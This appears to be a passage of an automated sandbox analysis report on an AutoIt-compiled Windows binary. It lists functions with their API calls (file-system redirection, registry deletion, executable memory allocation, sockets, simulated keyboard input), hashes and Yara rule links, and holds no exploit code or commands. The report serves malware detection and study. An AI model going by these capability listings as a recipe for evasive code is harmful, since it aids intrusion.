                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD01730550727DFD7329F31DA5866676E9AF05791F12C83ADC8AD6260E774E880CA50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374D61, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00374D2E,?,00374F4F,?,004362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00374D6F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00374D81
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                                                                      • Opcode ID: 309bec1ffcbf5984cebc4fe3a2adf295a2280240ccfc72318e828c769ad1a3d5
                                                                                                                                                                      • Instruction ID: 10fdadb49540ab6157a1fcd6ea141e79cab62efe9e2d8bd2d00bf36b6db27089
                                                                                                                                                                      • Opcode Fuzzy Hash: 309bec1ffcbf5984cebc4fe3a2adf295a2280240ccfc72318e828c769ad1a3d5
                                                                                                                                                                      • Instruction Fuzzy Hash: F8D01730610723CFD7329F31D84866676ECAF15352F22C93AD8CBD6260E778E880CA50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374D94, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00374CE1,?), ref: 00374DA2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00374DB4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                                                                      • Opcode ID: 19508ba4a0b467d61a265d9fa4f586417d453945809d3fdaae45eaf6ee3412a7
                                                                                                                                                                      • Instruction ID: 3e5c2a8acdea0db4b307aa21f2e439e0f83a534fd3d2830bf864f0829fc79e3b
                                                                                                                                                                      • Opcode Fuzzy Hash: 19508ba4a0b467d61a265d9fa4f586417d453945809d3fdaae45eaf6ee3412a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 12D01731650723CFD7329F31D858A9676E8AF05355F12C83ADCDAD6250EB78E880CA50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F1072, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,003F12C1), ref: 003F1080
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003F1092
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                                                                      • Opcode ID: 4fb16b69805a37b82a568cd0418b74550a6e45205b794588e731b5c74c91730d
                                                                                                                                                                      • Instruction ID: e8662cfd8d52b6f0fa302e6be2aab29b49ce936c0807b102414e3e3326d28180
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fb16b69805a37b82a568cd0418b74550a6e45205b794588e731b5c74c91730d
                                                                                                                                                                      • Instruction Fuzzy Hash: 71D01230510727CFD7315F35E81862676E8EF05351F518D7AA886D6250DB74D4C0C650
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E93F5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003E9009,?,003FF910), ref: 003E9403
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003E9415
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                                                                      • Opcode ID: 369ff7612ae1846742a6eb5db54e0e34070b11c7ff8c1862aad6514d6fa6d947
                                                                                                                                                                      • Instruction ID: 4a7e800615f11eee55f6e4337886bb2ffb98a2f0f9b1293998bcf4b94ced3ab9
                                                                                                                                                                      • Opcode Fuzzy Hash: 369ff7612ae1846742a6eb5db54e0e34070b11c7ff8c1862aad6514d6fa6d947
                                                                                                                                                                      • Instruction Fuzzy Hash: A4D01734614727CFD7229F33D94865676E9AF05391F12C93AE886D6690E674C880CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B1B3E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                                                                      • Opcode ID: 80b5d9e3752704111e827dd8c46a9267f8174b94151ee605110a52395269961e
                                                                                                                                                                      • Instruction ID: 011df39b972cc5a4981fba117fd59e55de21bb3d71a7820f291c4ce14575724c
                                                                                                                                                                      • Opcode Fuzzy Hash: 80b5d9e3752704111e827dd8c46a9267f8174b94151ee605110a52395269961e
                                                                                                                                                                      • Instruction Fuzzy Hash: 22D012B6814118EECB16DA909C54DFAB77CAB04305F944592BA0691C00F7349B95DB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EE33E, Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 003EE3D2
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 003EE415
                                                                                                                                                                        • Part of subcall function 003EDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003EDAD9
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003EE615
                                                                                                                                                                      • _memmove.LIBCMT ref: 003EE628
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3659485706-0
                                                                                                                                                                      • Opcode ID: 14fea349d9f874fef70ca05663c8599b07c558c9345dd91ba4521b3f4a4ed111
                                                                                                                                                                      • Instruction ID: 414b614a6251db5a5b5d6f7d2f7fa86fc1704791628fd87d8fe8223ac167df11
                                                                                                                                                                      • Opcode Fuzzy Hash: 14fea349d9f874fef70ca05663c8599b07c558c9345dd91ba4521b3f4a4ed111
                                                                                                                                                                      • Instruction Fuzzy Hash: E1C17C716083518FC716DF29C48096ABBE4FF89714F048A6EF89A9B391D731E905CF82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C6DF3, Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2808897238-0
                                                                                                                                                                      • Opcode ID: 34ebcbe629eb1d3ff9e16562b712d71847b6173c5f4631ee0dc280d532fdd876
                                                                                                                                                                      • Instruction ID: 0334bc94f0eabc0baf3f605547a7415f615d3f5d04a049590902d29129553596
                                                                                                                                                                      • Opcode Fuzzy Hash: 34ebcbe629eb1d3ff9e16562b712d71847b6173c5f4631ee0dc280d532fdd876
                                                                                                                                                                      • Instruction Fuzzy Hash: AF5196356043029BDB36AF65D896F2AB3E9AF48310F20881FE95ACB691DB709C40DF11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F9A63, Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003F9AD2
                                                                                                                                                                      • ScreenToClient.USER32 ref: 003F9B05
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003F9B72
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                      • Opcode ID: ec230de5ae4e59633e14d217bfed0d3f9a1f113ed69f145ed20bb8be19b0f287
                                                                                                                                                                      • Instruction ID: 6e64ecf046706138336bf2b9aa43f64e921e83d9e1551a1b0e0872cb548cc34f
                                                                                                                                                                      • Opcode Fuzzy Hash: ec230de5ae4e59633e14d217bfed0d3f9a1f113ed69f145ed20bb8be19b0f287
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F511D34A00209AFCF25DF58D981BBE7BB5FF55360F15816AFA159B290D730AD41CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039493A, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2782032738-0
                                                                                                                                                                      • Opcode ID: 435e28485697a51ef5e20de7f00e570821608ee35dc79d17666abcae11e36720
                                                                                                                                                                      • Instruction ID: c7440f7b1970b1f475a4c8bf223650e355299e292f8e0d15c42b598d9143b58d
                                                                                                                                                                      • Opcode Fuzzy Hash: 435e28485697a51ef5e20de7f00e570821608ee35dc79d17666abcae11e36720
                                                                                                                                                                      • Instruction Fuzzy Hash: D741E670A007069FDF2ADFA9C880DAF77AAEF85360B24817DE855CB640E770DD428B44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E6CBD, Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 003E6CE4
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E6CF4
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003E6D58
                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 003E6D64
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2214342067-0
                                                                                                                                                                      • Opcode ID: c22c43f6775b4d85bd3a532eea78d76f8f8ce6aceed1d32d0246a4c6818f2ecd
                                                                                                                                                                      • Instruction ID: ec4d1913f0b9ed1a6bf5ce8868c0ae22df26d99e6a3a788d0daf0c037e865c5d
                                                                                                                                                                      • Opcode Fuzzy Hash: c22c43f6775b4d85bd3a532eea78d76f8f8ce6aceed1d32d0246a4c6818f2ecd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E419D74740210AFEB22AF24DC87F7A77A9AF44B60F44C119FA599F2D2DB749C008B91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E672D, Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003FF910), ref: 003E67BA
                                                                                                                                                                      • _strlen.LIBCMT ref: 003E67EC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                                      • Opcode ID: e66daf14f3ca6a648d7ba18cf61f67aeff77ade2b32d4f307987adb36290cea1
                                                                                                                                                                      • Instruction ID: faac838218b1dbbb632fbbcf80ec0757c50bc2802f6b312530423877b2d41b42
                                                                                                                                                                      • Opcode Fuzzy Hash: e66daf14f3ca6a648d7ba18cf61f67aeff77ade2b32d4f307987adb36290cea1
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A41A535900118AFCB16EB65DCC2FAEB3A9EF54350F148269F91A9B2D2DB74AD00CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DBA5F, Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003DBB09
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 003DBB2F
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003DBB54
                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003DBB80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                      • Opcode ID: bb45c6a45386dea7f69033d3ad628c8da0cb36a2f3e07c1d01a05b38e2259454
                                                                                                                                                                      • Instruction ID: 94b126cf02a51d8adabc526c5a886ec546d42973501b69d1fe090530d73acff6
                                                                                                                                                                      • Opcode Fuzzy Hash: bb45c6a45386dea7f69033d3ad628c8da0cb36a2f3e07c1d01a05b38e2259454
                                                                                                                                                                      • Instruction Fuzzy Hash: 24410A39200510DFCB22DF15C584A5DBBE5AF89320B09C49AED4A9F762CB34FD01CB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F8AC0, Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003F8B4D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                      • Opcode ID: 73e485b65a9259e47061b6d43ccd1adbc49e918dfaf675bc6e5172c7fd9c78ae
                                                                                                                                                                      • Instruction ID: b1207a8f8b121c889d23d95f90241a63c65c9915f6f20075255ff71511400eda
                                                                                                                                                                      • Opcode Fuzzy Hash: 73e485b65a9259e47061b6d43ccd1adbc49e918dfaf675bc6e5172c7fd9c78ae
                                                                                                                                                                      • Instruction Fuzzy Hash: B131A1B460420CBFEF2A9B58CC49FB937A8EB05310F258512FB55D62A1CF34AD409B51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FADF1, Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 003FAE1A
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003FAE90
                                                                                                                                                                      • PtInRect.USER32(?,?,003FC304), ref: 003FAEA0
                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 003FAF11
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                      • Opcode ID: d3612f93d2cb1af51b8c6e00c899ea777c1268e771bded0ad04f537f2dad0e49
                                                                                                                                                                      • Instruction ID: 4e9818b97d34e19ecfd86f6ba3a239c60170558bcdee534a898dc0929f7df66a
                                                                                                                                                                      • Opcode Fuzzy Hash: d3612f93d2cb1af51b8c6e00c899ea777c1268e771bded0ad04f537f2dad0e49
                                                                                                                                                                      • Instruction Fuzzy Hash: 91418FB4600619EFCB12DF58C884A797BF5FF59350F1581A9EA18CF261D730A802DF52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D0FE6, Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003D1037
                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 003D1053
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003D10B9
                                                                                                                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003D110B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                      • Opcode ID: 308fc748bc1fb5788da00733e822a105c0c72bbe95d9577f6357a88f90ae78f6
                                                                                                                                                                      • Instruction ID: 5bd53e9e28fc06baf1ef722402252f068c66addd0f3fe066abadec3b39570d4a
                                                                                                                                                                      • Opcode Fuzzy Hash: 308fc748bc1fb5788da00733e822a105c0c72bbe95d9577f6357a88f90ae78f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B315772E40688BFFB33AA25AC05BFABBA9AF45310F08421BF580567D1C37489C49751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D1121, Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?,774273F0,?,00008000), ref: 003D1176
                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 003D1192
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 003D11F1
                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,774273F0,?,00008000), ref: 003D1243
                                                                                                                                                                      Memory Dump Source
